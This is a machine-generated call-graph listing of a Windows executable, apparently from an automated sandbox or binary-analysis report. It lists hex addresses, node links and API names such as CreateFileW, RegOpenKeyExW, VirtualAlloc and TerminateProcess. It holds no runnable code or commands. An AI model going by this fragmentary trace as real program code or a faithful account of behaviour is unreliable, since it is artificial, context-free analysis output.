6b8d34 __wsopen_nolock 58 API calls 99283->99286 99287 6b8d68 __ftell_nolock 58 API calls 99284->99287 99288 6bdb28 99285->99288 99289 6bdb32 99285->99289 99292 6bdb2d 99286->99292 99301 6bdaeb __tzset_nolock 99287->99301 99290 6b8d34 __wsopen_nolock 58 API calls 99288->99290 99291 6bd446 ___lock_fhandle 59 API calls 99289->99291 99290->99292 99293 6bdb38 99291->99293 99294 6b8d68 __ftell_nolock 58 API calls 99292->99294 99295 6bdb4b 99293->99295 99296 6bdb5e 99293->99296 99297 6bdba1 99294->99297 99299 6bdbb5 __write_nolock 76 API calls 99295->99299 99298 6b8d68 __ftell_nolock 58 API calls 99296->99298 99300 6b8ff6 __ftell_nolock 9 API calls 99297->99300 99302 6bdb63 99298->99302 99303 6bdb57 99299->99303 99300->99301 99301->99273 99304 6b8d34 __wsopen_nolock 58 API calls 99302->99304 99305 6bdb8d __write LeaveCriticalSection 99303->99305 99304->99303 99305->99301 99306->99267 99307->99270 99309 6b4c80 99308->99309 99313 6b4ca4 99308->99313 99310 6b4916 __ftell_nolock 58 API calls 99309->99310 99309->99313 99311 6b4c9d 99310->99311 99312 6bdac6 __write 78 API calls 99311->99312 99312->99313 99313->99273 99314->99273 99316 6b5579 99315->99316 99317 6b558d 99315->99317 99364 6b8d68 58 API calls __getptd_noexit 99316->99364 99319 6b5589 99317->99319 99321 6b4c6d __flush 78 API calls 99317->99321 99333 6b5645 LeaveCriticalSection LeaveCriticalSection __wfsopen 99319->99333 99320 6b557e 99365 6b8ff6 9 API calls __ftell_nolock 99320->99365 99323 6b5599 99321->99323 99334 6c0dc7 99323->99334 99326 6b4916 __ftell_nolock 58 API calls 99327 6b55a7 99326->99327 99338 6c0c52 99327->99338 99329 6b55ad 99329->99319 99330 6b2f95 _free 58 API calls 99329->99330 99330->99319 99331->99236 99332->99240 99333->99240 99335 6b55a1 99334->99335 99336 6c0dd4 99334->99336 99335->99326 99336->99335 99337 6b2f95 _free 58 API calls 99336->99337 99337->99335 99339 6c0c5e __tzset_nolock 99338->99339 99340 6c0c6b 99339->99340 99341 6c0c82 99339->99341 99390 6b8d34 58 API calls __getptd_noexit 99340->99390 99343 6c0d0d 99341->99343 99345 6c0c92 99341->99345 99395 6b8d34 58 API calls __getptd_noexit 99343->99395 99344 6c0c70 99391 6b8d68 58 API calls __getptd_noexit 99344->99391 99348 6c0cba 99345->99348 99349 6c0cb0 99345->99349 99366 6bd446 99348->99366 99392 6b8d34 58 API calls __getptd_noexit 99349->99392 99350 6c0cb5 99396 6b8d68 58 API calls __getptd_noexit 99350->99396 99354 6c0cc0 99356 6c0cde 99354->99356 99357 6c0cd3 99354->99357 99355 6c0d19 99397 6b8ff6 9 API calls __ftell_nolock 99355->99397 99393 6b8d68 58 API calls __getptd_noexit 99356->99393 99375 6c0d2d 99357->99375 99359 6c0c77 __tzset_nolock 99359->99329 99362 6c0cd9 99394 6c0d05 LeaveCriticalSection __unlock_fhandle 99362->99394 99364->99320 99365->99319 99367 6bd452 __tzset_nolock 99366->99367 99368 6bd4a1 EnterCriticalSection 99367->99368 99369 6b9e4b __lock 58 API calls 99367->99369 99370 6bd4c7 __tzset_nolock 99368->99370 99371 6bd477 99369->99371 99370->99354 99372 6bd48f 99371->99372 99398 6ba06b InitializeCriticalSectionAndSpinCount 99371->99398 99399 6bd4cb LeaveCriticalSection _doexit 99372->99399 99400 6bd703 99375->99400 99377 6c0d91 99413 6bd67d 59 API calls 2 library calls 99377->99413 99379 6c0d3b 99379->99377 99382 6bd703 __commit 58 API calls 99379->99382 99389 6c0d6f 99379->99389 99380 6bd703 __commit 58 API calls 99384 6c0d7b FindCloseChangeNotification 99380->99384 99381 6c0d99 99385 6c0dbb 99381->99385 99414 6b8d47 58 API calls 3 library calls 99381->99414 99383 6c0d66 99382->99383 99386 6bd703 __commit 58 API calls 99383->99386 99384->99377 99387 6c0d87 GetLastError 99384->99387 99385->99362 99386->99389 99387->99377 99389->99377 99389->99380 99390->99344 99391->99359 99392->99350 99393->99362 99394->99359 99395->99350 99396->99355 99397->99359 99398->99372 99399->99368 99401 6bd70e 99400->99401 99402 6bd723 99400->99402 99403 6b8d34 __wsopen_nolock 58 API calls 99401->99403 99405 6b8d34 __wsopen_nolock 58 API calls 99402->99405 99408 6bd748 99402->99408 99404 6bd713 99403->99404 99407 6b8d68 __ftell_nolock 58 API calls 99404->99407 99406 6bd752 99405->99406 99409 6b8d68 __ftell_nolock 58 API calls 99406->99409 99411 6bd71b 99407->99411 99408->99379 99410 6bd75a 99409->99410 99412 6b8ff6 __ftell_nolock 9 API calls 99410->99412 99411->99379 99412->99411 99413->99381 99414->99385 99416 6c1b90 __ftell_nolock 99415->99416 99417 6b09e2 GetLongPathNameW 99416->99417 99418 697d2c 59 API calls 99417->99418 99419 69741d 99418->99419 99420 69716b 99419->99420 99421 6977c7 59 API calls 99420->99421 99422 69717d 99421->99422 99423 6948ae 60 API calls 99422->99423 99424 697188 99423->99424 99425 6cecae 99424->99425 99426 697193 99424->99426 99431 6cecc8 99425->99431 99473 697a68 61 API calls 99425->99473 99428 693f84 59 API calls 99426->99428 99429 69719f 99428->99429 99467 6934c2 99429->99467 99432 6971b2 Mailbox 99432->98440 99434 694f3d 136 API calls 99433->99434 99435 6969ef 99434->99435 99436 6ce45a 99435->99436 99437 694f3d 136 API calls 99435->99437 99438 6f97e5 122 API calls 99436->99438 99439 696a03 99437->99439 99440 6ce46f 99438->99440 99439->99436 99441 696a0b 99439->99441 99442 6ce490 99440->99442 99443 6ce473 99440->99443 99445 6ce47b 99441->99445 99446 696a17 99441->99446 99444 6b0ff6 Mailbox 59 API calls 99442->99444 99447 694faa 84 API calls 99443->99447 99463 6ce4d5 Mailbox 99444->99463 99567 6f4534 90 API calls _wprintf 99445->99567 99474 696bec 99446->99474 99447->99445 99451 6ce489 99451->99442 99452 6ce689 99453 6b2f95 _free 58 API calls 99452->99453 99454 6ce691 99453->99454 99455 694faa 84 API calls 99454->99455 99460 6ce69a 99455->99460 99459 6b2f95 _free 58 API calls 99459->99460 99460->99459 99461 694faa 84 API calls 99460->99461 99573 6efcb1 89 API calls 4 library calls 99460->99573 99461->99460 99463->99452 99463->99460 99464 697f41 59 API calls 99463->99464 99568 6efc4d 59 API calls 2 library calls 99463->99568 99569 6efb6e 61 API calls 2 library calls 99463->99569 99570 6f7621 59 API calls Mailbox 99463->99570 99571 69766f 59 API calls 2 library calls 99463->99571 99572 6974bd 59 API calls Mailbox 99463->99572 99464->99463 99468 6934d4 99467->99468 99472 6934f3 _memmove 99467->99472 99470 6b0ff6 Mailbox 59 API calls 99468->99470 99469 6b0ff6 Mailbox 59 API calls 99471 69350a 99469->99471 99470->99472 99471->99432 99472->99469 99473->99425 99475 6ce847 99474->99475 99476 696c15 99474->99476 99665 6efcb1 89 API calls 4 library calls 99475->99665 99579 695906 60 API calls Mailbox 99476->99579 99479 6ce85a 99666 6efcb1 89 API calls 4 library calls 99479->99666 99480 696c37 99580 695956 99480->99580 99483 696c54 99485 6977c7 59 API calls 99483->99485 99487 696c60 99485->99487 99486 6ce876 99489 696cc1 99486->99489 99593 6b0b9b 60 API calls __ftell_nolock 99487->99593 99491 6ce889 99489->99491 99492 696ccf 99489->99492 99490 696c6c 99493 6977c7 59 API calls 99490->99493 99494 695dcf CloseHandle 99491->99494 99495 6977c7 59 API calls 99492->99495 99496 696c78 99493->99496 99497 6ce895 99494->99497 99498 696cd8 99495->99498 99500 6948ae 60 API calls 99496->99500 99501 694f3d 136 API calls 99497->99501 99499 6977c7 59 API calls 99498->99499 99502 696ce1 99499->99502 99503 696c86 99500->99503 99504 6ce8b1 99501->99504 99603 6946f9 99502->99603 99594 6959b0 ReadFile SetFilePointerEx 99503->99594 99507 6ce8da 99504->99507 99508 6f97e5 122 API calls 99504->99508 99667 6efcb1 89 API calls 4 library calls 99507->99667 99512 6ce8cd 99508->99512 99509 696cf8 99511 696cb2 99595 695c4e 99511->99595 99516 6ce8d5 99512->99516 99517 6ce8f6 99512->99517 99514 6ce8f1 99545 696e6c Mailbox 99514->99545 99519 694faa 84 API calls 99516->99519 99520 694faa 84 API calls 99517->99520 99519->99507 99521 6ce8fb 99520->99521 99522 6b0ff6 Mailbox 59 API calls 99521->99522 99529 6ce92f 99522->99529 99526 693bcd 99526->98307 99526->98330 99668 69766f 59 API calls 2 library calls 99529->99668 99533 6ceb69 99674 6f7581 59 API calls Mailbox 99533->99674 99538 6ceb8b 99675 6ff835 59 API calls 2 library calls 99538->99675 99541 6ceb98 99543 6b2f95 _free 58 API calls 99541->99543 99543->99545 99574 695934 99545->99574 99557 697f41 59 API calls 99564 6ce978 Mailbox 99557->99564 99561 6cebbb 99676 6efcb1 89 API calls 4 library calls 99561->99676 99563 6cebd4 99565 6b2f95 _free 58 API calls 99563->99565 99564->99533 99564->99557 99564->99561 99669 6efc4d 59 API calls 2 library calls 99564->99669 99670 6efb6e 61 API calls 2 library calls 99564->99670 99671 6f7621 59 API calls Mailbox 99564->99671 99672 69766f 59 API calls 2 library calls 99564->99672 99673 697373 59 API calls Mailbox 99564->99673 99566 6cebe7 99565->99566 99566->99545 99567->99451 99568->99463 99569->99463 99570->99463 99571->99463 99572->99463 99573->99460 99575 695dcf CloseHandle 99574->99575 99576 69593c Mailbox 99575->99576 99577 695dcf CloseHandle 99576->99577 99578 69594b 99577->99578 99578->99526 99579->99480 99581 695dcf CloseHandle 99580->99581 99582 695962 99581->99582 99679 695df9 99582->99679 99584 695981 99588 6959a4 99584->99588 99687 695770 99584->99687 99586 695993 99704 6953db SetFilePointerEx SetFilePointerEx 99586->99704 99588->99479 99588->99483 99589 6ce030 99705 6f3696 SetFilePointerEx SetFilePointerEx WriteFile 99589->99705 99590 69599a 99590->99588 99590->99589 99592 6ce060 99592->99588 99593->99490 99594->99511 99602 695c68 99595->99602 99596 695cef SetFilePointerEx 99711 695dae SetFilePointerEx 99596->99711 99597 6ce151 99712 695dae SetFilePointerEx 99597->99712 99600 695cc3 99600->99489 99601 6ce16b 99602->99596 99602->99597 99602->99600 99604 6977c7 59 API calls 99603->99604 99605 69470f 99604->99605 99606 6977c7 59 API calls 99605->99606 99607 694717 99606->99607 99608 6977c7 59 API calls 99607->99608 99609 69471f 99608->99609 99610 6977c7 59 API calls 99609->99610 99611 694727 99610->99611 99612 69475b 99611->99612 99613 6cd8fb 99611->99613 99614 6979ab 59 API calls 99612->99614 99615 6981a7 59 API calls 99613->99615 99616 694769 99614->99616 99617 6cd904 99615->99617 99618 697e8c 59 API calls 99616->99618 99619 697eec 59 API calls 99617->99619 99620 694773 99618->99620 99622 69479e 99619->99622 99621 6979ab 59 API calls 99620->99621 99620->99622 99624 694794 99621->99624 99625 6947bd 99622->99625 99626 6cd924 99622->99626 99640 6947de 99622->99640 99628 697e8c 59 API calls 99624->99628 99630 697b52 59 API calls 99625->99630 99629 6cd9f4 99626->99629 99637 6cd9dd 99626->99637 99648 6cd95b 99626->99648 99627 6947ef 99632 6981a7 59 API calls 99627->99632 99633 694801 99627->99633 99628->99622 99631 697d2c 59 API calls 99629->99631 99635 6947c7 99630->99635 99649 6cd9b1 99631->99649 99632->99633 99634 694811 99633->99634 99636 6981a7 59 API calls 99633->99636 99638 694818 99634->99638 99641 6981a7 59 API calls 99634->99641 99639 6979ab 59 API calls 99635->99639 99635->99640 99636->99634 99637->99629 99644 6cd9c8 99637->99644 99642 6981a7 59 API calls 99638->99642 99651 69481f Mailbox 99638->99651 99639->99640 99713 6979ab 99640->99713 99641->99638 99642->99651 99643 697b52 59 API calls 99643->99649 99647 697d2c 59 API calls 99644->99647 99645 6cd9b9 99646 697d2c 59 API calls 99645->99646 99646->99649 99647->99649 99648->99645 99652 6cd9a4 99648->99652 99649->99640 99649->99643 99726 697a84 59 API calls 2 library calls 99649->99726 99651->99509 99653 697d2c 59 API calls 99652->99653 99653->99649 99665->99479 99666->99486 99667->99514 99668->99564 99669->99564 99670->99564 99671->99564 99672->99564 99673->99564 99674->99538 99675->99541 99676->99563 99680 695e12 CreateFileW 99679->99680 99681 6ce181 99679->99681 99684 695e34 99680->99684 99682 6ce187 CreateFileW 99681->99682 99681->99684 99683 6ce1ad 99682->99683 99682->99684 99685 695c4e 2 API calls 99683->99685 99684->99584 99686 6ce1b8 99685->99686 99686->99684 99688 6cdfce 99687->99688 99689 69578b 99687->99689 99690 69581a 99688->99690 99706 695e3f 99688->99706 99689->99690 99691 695c4e 2 API calls 99689->99691 99690->99586 99692 6957ad 99691->99692 99693 69538e 59 API calls 99692->99693 99695 6957b7 99693->99695 99695->99688 99696 6957c4 99695->99696 99697 6b0ff6 Mailbox 59 API calls 99696->99697 99698 6957cf 99697->99698 99699 69538e 59 API calls 99698->99699 99700 6957da 99699->99700 99701 695d20 2 API calls 99700->99701 99702 695807 99701->99702 99703 695c4e 2 API calls 99702->99703 99703->99690 99704->99590 99705->99592 99707 695c4e 2 API calls 99706->99707 99708 695e60 99707->99708 99709 695c4e 2 API calls 99708->99709 99710 695e74 99709->99710 99710->99690 99711->99600 99712->99601 99714 6979ba 99713->99714 99715 697a17 99713->99715 99714->99715 99717 6979c5 99714->99717 99716 697e8c 59 API calls 99715->99716 99723 6979e8 _memmove 99716->99723 99718 6979e0 99717->99718 99719 6cef32 99717->99719 99727 698087 59 API calls Mailbox 99718->99727 99720 698189 59 API calls 99719->99720 99722 6cef3c 99720->99722 99724 6b0ff6 Mailbox 59 API calls 99722->99724 99723->99627 99725 6cef5c 99724->99725 99726->99649 99727->99723 99729 696ef5 99728->99729 99733 697009 99728->99733 99730 6b0ff6 Mailbox 59 API calls 99729->99730 99729->99733 99732 696f1c 99730->99732 99731 6b0ff6 Mailbox 59 API calls 99734 696f91 99731->99734 99732->99731 99733->98446 99734->99733 99741 6963a0 99734->99741 99767 6974bd 59 API calls Mailbox 99734->99767 99768 6e6ac9 59 API calls Mailbox 99734->99768 99769 69766f 59 API calls 2 library calls 99734->99769 99739->98449 99740->98451 99742 697b76 59 API calls 99741->99742 99759 6963c5 99742->99759 99743 6965ca 99745 6965e4 Mailbox 99745->99734 99748 6ce41f 99775 6efdba 91 API calls 4 library calls 99748->99775 99749 6ce3eb _memmove 99749->99748 99757 6968f9 99749->99757 99750 69766f 59 API calls 99750->99759 99755 697eec 59 API calls 99755->99759 99757->99745 99777 6efdba 91 API calls 4 library calls 99757->99777 99759->99743 99759->99748 99759->99749 99759->99750 99759->99755 99759->99757 99760 6ce3bb 99759->99760 99764 697faf 59 API calls 99759->99764 99770 6960cc 60 API calls 99759->99770 99771 695ea1 59 API calls Mailbox 99759->99771 99773 695fd2 60 API calls 99759->99773 99774 697a84 59 API calls 2 library calls 99759->99774 99761 698189 59 API calls 99760->99761 99767->99734 99768->99734 99769->99734 99770->99759 99771->99759 99773->99759 99774->99759 99777->99745 99778->98464 99779->98465 100197 693633 100198 69366a 100197->100198 100199 693688 100198->100199 100200 6936e7 100198->100200 100241 6936e5 100198->100241 100201 69375d PostQuitMessage 100199->100201 100202 693695 100199->100202 100204 6cd31c 100200->100204 100205 6936ed 100200->100205 100209 6936d8 100201->100209 100206 6cd38f 100202->100206 100207 6936a0 100202->100207 100203 6936ca DefWindowProcW 100203->100209 100247 6a11d0 10 API calls Mailbox 100204->100247 100210 6936f2 100205->100210 100211 693715 SetTimer RegisterWindowMessageW 100205->100211 100252 6f2a16 71 API calls _memset 100206->100252 100212 6936a8 100207->100212 100213 693767 100207->100213 100217 6936f9 KillTimer 100210->100217 100218 6cd2bf 100210->100218 100211->100209 100214 69373e CreatePopupMenu 100211->100214 100219 6cd374 100212->100219 100220 6936b3 100212->100220 100245 694531 64 API calls _memset 100213->100245 100214->100209 100216 6cd343 100248 6a11f3 331 API calls Mailbox 100216->100248 100242 6944cb Shell_NotifyIconW _memset 100217->100242 100224 6cd2f8 MoveWindow 100218->100224 100225 6cd2c4 100218->100225 100219->100203 100251 6e817e 59 API calls Mailbox 100219->100251 100227 69374b 100220->100227 100228 6936be 100220->100228 100221 6cd3a1 100221->100203 100221->100209 100224->100209 100230 6cd2c8 100225->100230 100231 6cd2e7 SetFocus 100225->100231 100244 6945df 81 API calls _memset 100227->100244 100228->100203 100249 6944cb Shell_NotifyIconW _memset 100228->100249 100229 69375b 100229->100209 100230->100228 100236 6cd2d1 100230->100236 100231->100209 100232 69370c 100243 693114 DeleteObject DestroyWindow Mailbox 100232->100243 100246 6a11d0 10 API calls Mailbox 100236->100246 100239 6cd368 100250 6943db 68 API calls _memset 100239->100250 100241->100203 100242->100232 100243->100209 100244->100229 100245->100229 100246->100209 100247->100216 100248->100228 100249->100239 100250->100241 100251->100241 100252->100221 100253 6cff06 100254 6cff10 100253->100254 100292 69ac90 Mailbox _memmove 100253->100292 100448 698e34 59 API calls Mailbox 100254->100448 100258 69b685 100453 6fa0b5 89 API calls 4 library calls 100258->100453 100259 6b0ff6 59 API calls Mailbox 100277 69a097 Mailbox 100259->100277 100261 69b5d5 100266 6981a7 59 API calls 100261->100266 100264 6981a7 59 API calls 100264->100277 100275 69a1b7 100266->100275 100267 6d047f 100452 6fa0b5 89 API calls 4 library calls 100267->100452 100269 697f41 59 API calls 100269->100292 100271 6977c7 59 API calls 100271->100277 100272 6e7405 59 API calls 100272->100277 100273 6d048e 100274 6b2f80 67 API calls __cinit 100274->100277 100277->100259 100277->100261 100277->100264 100277->100267 100277->100271 100277->100272 100277->100274 100277->100275 100279 6d0e00 100277->100279 100282 69b5da 100277->100282 100283 69a6ba 100277->100283 100443 69ca20 331 API calls 2 library calls 100277->100443 100444 69ba60 60 API calls Mailbox 100277->100444 100278 6e66f4 Mailbox 59 API calls 100278->100275 100456 6fa0b5 89 API calls 4 library calls 100279->100456 100281 70bf80 331 API calls 100281->100292 100457 6fa0b5 89 API calls 4 library calls 100282->100457 100455 6fa0b5 89 API calls 4 library calls 100283->100455 100285 6b0ff6 59 API calls Mailbox 100285->100292 100286 69a000 331 API calls 100286->100292 100288 6d0c94 100289 699df0 Mailbox 59 API calls 100288->100289 100293 6d0c86 100289->100293 100290 6d0ca2 100454 6fa0b5 89 API calls 4 library calls 100290->100454 100292->100258 100292->100269 100292->100275 100292->100277 100292->100281 100292->100285 100292->100286 100292->100288 100292->100290 100294 69b37c 100292->100294 100299 69b416 100292->100299 100302 69ade2 Mailbox 100292->100302 100402 70c5f4 100292->100402 100434 6f7be0 100292->100434 100440 6e66f4 100292->100440 100449 6e7405 59 API calls 100292->100449 100450 70c4a7 85 API calls 2 library calls 100292->100450 100293->100275 100293->100278 100445 699e9c 60 API calls Mailbox 100294->100445 100297 69b38d 100446 699e9c 60 API calls Mailbox 100297->100446 100447 69f803 331 API calls 100299->100447 100301 699df0 Mailbox 59 API calls 100301->100302 100302->100258 100302->100275 100302->100293 100302->100301 100303 6d00e0 VariantClear 100302->100303 100308 70474d 331 API calls 100302->100308 100309 70e237 100302->100309 100312 70e24b 100302->100312 100315 6fd2e6 100302->100315 100362 6a2123 100302->100362 100451 6e7405 59 API calls 100302->100451 100303->100302 100308->100302 100458 70cdf1 100309->100458 100311 70e247 100311->100302 100313 70cdf1 130 API calls 100312->100313 100314 70e25b 100313->100314 100314->100302 100316 6fd310 100315->100316 100317 6fd305 100315->100317 100319 6fd3ea Mailbox 100316->100319 100322 6977c7 59 API calls 100316->100322 100548 699c9c 59 API calls 100317->100548 100320 6b0ff6 Mailbox 59 API calls 100319->100320 100358 6fd3f3 Mailbox 100319->100358 100321 6fd433 100320->100321 100323 6fd43f 100321->100323 100551 695906 60 API calls Mailbox 100321->100551 100324 6fd334 100322->100324 100328 699997 84 API calls 100323->100328 100326 6977c7 59 API calls 100324->100326 100327 6fd33d 100326->100327 100329 699997 84 API calls 100327->100329 100330 6fd457 100328->100330 100332 6fd349 100329->100332 100331 695956 67 API calls 100330->100331 100333 6fd466 100331->100333 100334 6946f9 59 API calls 100332->100334 100335 6fd49e 100333->100335 100336 6fd46a GetLastError 100333->100336 100337 6fd35e 100334->100337 100341 6fd4c9 100335->100341 100342 6fd500 100335->100342 100338 6fd483 100336->100338 100339 697c8e 59 API calls 100337->100339 100338->100358 100552 695a1a CloseHandle 100338->100552 100340 6fd391 100339->100340 100344 6fd3e3 100340->100344 100349 6f3e73 3 API calls 100340->100349 100343 6b0ff6 Mailbox 59 API calls 100341->100343 100345 6b0ff6 Mailbox 59 API calls 100342->100345 100346 6fd4ce 100343->100346 100550 699c9c 59 API calls 100344->100550 100350 6fd505 100345->100350 100351 6fd4df 100346->100351 100353 6977c7 59 API calls 100346->100353 100352 6fd3a1 100349->100352 100355 6977c7 59 API calls 100350->100355 100350->100358 100553 6ff835 59 API calls 2 library calls 100351->100553 100352->100344 100354 6fd3a5 100352->100354 100353->100351 100357 697f41 59 API calls 100354->100357 100355->100358 100359 6fd3b2 100357->100359 100358->100302 100549 6f3c66 63 API calls Mailbox 100359->100549 100361 6fd3bb Mailbox 100361->100344 100363 699bf8 59 API calls 100362->100363 100364 6a213b 100363->100364 100365 6b0ff6 Mailbox 59 API calls 100364->100365 100369 6d69af 100364->100369 100367 6a2154 100365->100367 100368 6a2164 100367->100368 100569 695906 60 API calls Mailbox 100367->100569 100372 699997 84 API calls 100368->100372 100370 6a2189 100369->100370 100573 6ff7df 59 API calls 100369->100573 100378 6a2196 100370->100378 100574 699c9c 59 API calls 100370->100574 100374 6a2172 100372->100374 100376 695956 67 API calls 100374->100376 100375 6d69f7 100377 6d69ff 100375->100377 100375->100378 100379 6a2181 100376->100379 100575 699c9c 59 API calls 100377->100575 100381 695e3f 2 API calls 100378->100381 100379->100369 100379->100370 100572 695a1a CloseHandle 100379->100572 100383 6a219d 100381->100383 100384 6d6a11 100383->100384 100385 6a21b7 100383->100385 100387 6b0ff6 Mailbox 59 API calls 100384->100387 100386 6977c7 59 API calls 100385->100386 100388 6a21bf 100386->100388 100389 6d6a17 100387->100389 100554 6956d2 100388->100554 100391 6d6a2b 100389->100391 100576 6959b0 ReadFile SetFilePointerEx 100389->100576 100396 6d6a2f _memmove 100391->100396 100577 6f794e 59 API calls 2 library calls 100391->100577 100393 6a21ce 100393->100396 100570 699b9c 59 API calls Mailbox 100393->100570 100397 6a21e2 Mailbox 100398 6a221c 100397->100398 100399 695dcf CloseHandle 100397->100399 100398->100302 100400 6a2210 100399->100400 100400->100398 100571 695a1a CloseHandle 100400->100571 100403 6977c7 59 API calls 100402->100403 100404 70c608 100403->100404 100405 6977c7 59 API calls 100404->100405 100406 70c610 100405->100406 100407 6977c7 59 API calls 100406->100407 100408 70c618 100407->100408 100409 699997 84 API calls 100408->100409 100433 70c626 100409->100433 100410 697d2c 59 API calls 100410->100433 100411 70c80f 100412 70c83c Mailbox 100411->100412 100582 699b9c 59 API calls Mailbox 100411->100582 100412->100292 100414 70c7f6 100416 697e0b 59 API calls 100414->100416 100415 6981a7 59 API calls 100415->100433 100418 70c803 100416->100418 100417 70c811 100420 697e0b 59 API calls 100417->100420 100422 697c8e 59 API calls 100418->100422 100419 697a84 59 API calls 100419->100433 100423 70c820 100420->100423 100421 697faf 59 API calls 100425 70c6bd CharUpperBuffW 100421->100425 100422->100411 100426 697c8e 59 API calls 100423->100426 100424 697faf 59 API calls 100427 70c77d CharUpperBuffW 100424->100427 100581 69859a 68 API calls 100425->100581 100426->100411 100429 69c707 69 API calls 100427->100429 100429->100433 100430 699997 84 API calls 100430->100433 100431 697e0b 59 API calls 100431->100433 100432 697c8e 59 API calls 100432->100433 100433->100410 100433->100411 100433->100412 100433->100414 100433->100415 100433->100417 100433->100419 100433->100421 100433->100424 100433->100430 100433->100431 100433->100432 100435 6f7bec 100434->100435 100436 6b0ff6 Mailbox 59 API calls 100435->100436 100437 6f7bfa 100436->100437 100438 6977c7 59 API calls 100437->100438 100439 6f7c08 100437->100439 100438->100439 100439->100292 100583 6e6636 100440->100583 100442 6e6702 100442->100292 100443->100277 100444->100277 100445->100297 100446->100299 100447->100258 100448->100292 100449->100292 100450->100292 100451->100302 100452->100273 100453->100293 100454->100293 100455->100275 100456->100282 100457->100275 100459 699997 84 API calls 100458->100459 100460 70ce2e 100459->100460 100479 70ce75 Mailbox 100460->100479 100496 70dab9 100460->100496 100462 70d0cd 100463 70d242 100462->100463 100467 70d0db 100462->100467 100535 70dbdc 92 API calls Mailbox 100463->100535 100466 70d251 100466->100467 100469 70d25d 100466->100469 100509 70cc82 100467->100509 100468 699997 84 API calls 100486 70cec6 Mailbox 100468->100486 100469->100479 100474 70d114 100524 6b0e48 100474->100524 100477 70d147 100481 69942e 59 API calls 100477->100481 100478 70d12e 100530 6fa0b5 89 API calls 4 library calls 100478->100530 100479->100311 100483 70d153 100481->100483 100482 70d139 GetCurrentProcess TerminateProcess 100482->100477 100484 6991b0 59 API calls 100483->100484 100485 70d169 100484->100485 100494 70d190 100485->100494 100531 698ea0 59 API calls Mailbox 100485->100531 100486->100462 100486->100468 100486->100479 100528 6ff835 59 API calls 2 library calls 100486->100528 100529 70d2f3 61 API calls 2 library calls 100486->100529 100488 70d2b8 100488->100479 100492 70d2cc FreeLibrary 100488->100492 100489 70d17f 100532 70d95d 107 API calls _free 100489->100532 100492->100479 100494->100488 100533 698ea0 59 API calls Mailbox 100494->100533 100534 699e9c 60 API calls Mailbox 100494->100534 100536 70d95d 107 API calls _free 100494->100536 100497 697faf 59 API calls 100496->100497 100498 70dad4 CharLowerBuffW 100497->100498 100537 6ef658 100498->100537 100502 6977c7 59 API calls 100503 70db0d 100502->100503 100504 6979ab 59 API calls 100503->100504 100505 70db24 100504->100505 100507 697e8c 59 API calls 100505->100507 100506 70db6c Mailbox 100506->100486 100508 70db30 Mailbox 100507->100508 100508->100506 100544 70d2f3 61 API calls 2 library calls 100508->100544 100510 70cc9d 100509->100510 100514 70ccf2 100509->100514 100511 6b0ff6 Mailbox 59 API calls 100510->100511 100512 70ccbf 100511->100512 100513 6b0ff6 Mailbox 59 API calls 100512->100513 100512->100514 100513->100512 100515 70dd64 100514->100515 100516 70df8d Mailbox 100515->100516 100523 70dd87 _strcat _wcscpy __NMSG_WRITE 100515->100523 100516->100474 100517 699c9c 59 API calls 100517->100523 100518 699cf8 59 API calls 100518->100523 100519 699d46 59 API calls 100519->100523 100520 699997 84 API calls 100520->100523 100521 6b594c 58 API calls _W_store_winword 100521->100523 100523->100516 100523->100517 100523->100518 100523->100519 100523->100520 100523->100521 100547 6f5b29 61 API calls 2 library calls 100523->100547 100525 6b0e5d 100524->100525 100526 6b0ef5 VirtualAlloc 100525->100526 100527 6b0ec3 100525->100527 100526->100527 100527->100477 100527->100478 100528->100486 100529->100486 100530->100482 100531->100489 100532->100494 100533->100494 100534->100494 100535->100466 100536->100494 100538 6ef683 __NMSG_WRITE 100537->100538 100539 6ef6c2 100538->100539 100542 6ef6b8 100538->100542 100543 6ef769 100538->100543 100539->100502 100539->100508 100542->100539 100545 697a24 61 API calls 100542->100545 100543->100539 100546 697a24 61 API calls 100543->100546 100544->100506 100545->100542 100546->100543 100547->100523 100548->100316 100549->100361 100550->100319 100551->100323 100552->100358 100553->100358 100555 6956dd 100554->100555 100556 695702 100554->100556 100555->100556 100560 6956ec 100555->100560 100557 697eec 59 API calls 100556->100557 100561 6f349a 100557->100561 100558 6f34c9 100558->100393 100562 695c18 59 API calls 100560->100562 100561->100558 100578 6f3436 ReadFile SetFilePointerEx 100561->100578 100579 697a84 59 API calls 2 library calls 100561->100579 100563 6f35ba 100562->100563 100565 695632 61 API calls 100563->100565 100566 6f35c8 100565->100566 100568 6f35d8 Mailbox 100566->100568 100580 69793a 61 API calls Mailbox 100566->100580 100568->100393 100569->100368 100570->100397 100571->100398 100572->100369 100573->100369 100574->100375 100575->100383 100576->100391 100577->100396 100578->100561 100579->100561 100580->100568 100581->100433 100582->100412 100584 6e665e 100583->100584 100585 6e6641 100583->100585 100584->100442 100585->100584 100587 6e6621 59 API calls Mailbox 100585->100587 100587->100585 100588 6d0226 100594 69ade2 Mailbox 100588->100594 100590 6d0c86 100591 6e66f4 Mailbox 59 API calls 100590->100591 100592 6d0c8f 100591->100592 100593 699df0 Mailbox 59 API calls 100593->100594 100594->100590 100594->100592 100594->100593 100595 6d00e0 VariantClear 100594->100595 100596 69b6c1 100594->100596 100598 70e237 130 API calls 100594->100598 100599 6a2123 95 API calls 100594->100599 100600 6fd2e6 101 API calls 100594->100600 100601 70e24b 130 API calls 100594->100601 100602 70474d 331 API calls 100594->100602 100603 6e7405 59 API calls 100594->100603 100595->100594 100604 6fa0b5 89 API calls 4 library calls 100596->100604 100598->100594 100599->100594 100600->100594 100601->100594 100602->100594 100603->100594 100604->100590 100605 691055 100610 692649 100605->100610 100608 6b2f80 __cinit 67 API calls 100609 691064 100608->100609 100611 6977c7 59 API calls 100610->100611 100612 6926b7 100611->100612 100617 693582 100612->100617 100615 692754 100616 69105a 100615->100616 100620 693416 59 API calls 2 library calls 100615->100620 100616->100608 100621 6935b0 100617->100621 100620->100615 100622 6935bd 100621->100622 100623 6935a1 100621->100623 100622->100623 100624 6935c4 RegOpenKeyExW 100622->100624 100623->100615 100624->100623 100625 6935de RegQueryValueExW 100624->100625 100626 6935ff 100625->100626 100627 693614 RegCloseKey 100625->100627 100626->100627 100627->100623 100628 691066 100633 69f8cf 100628->100633 100630 69106c 100631 6b2f80 __cinit 67 API calls 100630->100631 100632 691076 100631->100632 100634 69f8f0 100633->100634 100666 6b0143 100634->100666 100638 69f937 100639 6977c7 59 API calls 100638->100639 100640 69f941 100639->100640 100641 6977c7 59 API calls 100640->100641 100642 69f94b 100641->100642 100643 6977c7 59 API calls 100642->100643 100644 69f955 100643->100644 100645 6977c7 59 API calls 100644->100645 100646 69f993 100645->100646 100647 6977c7 59 API calls 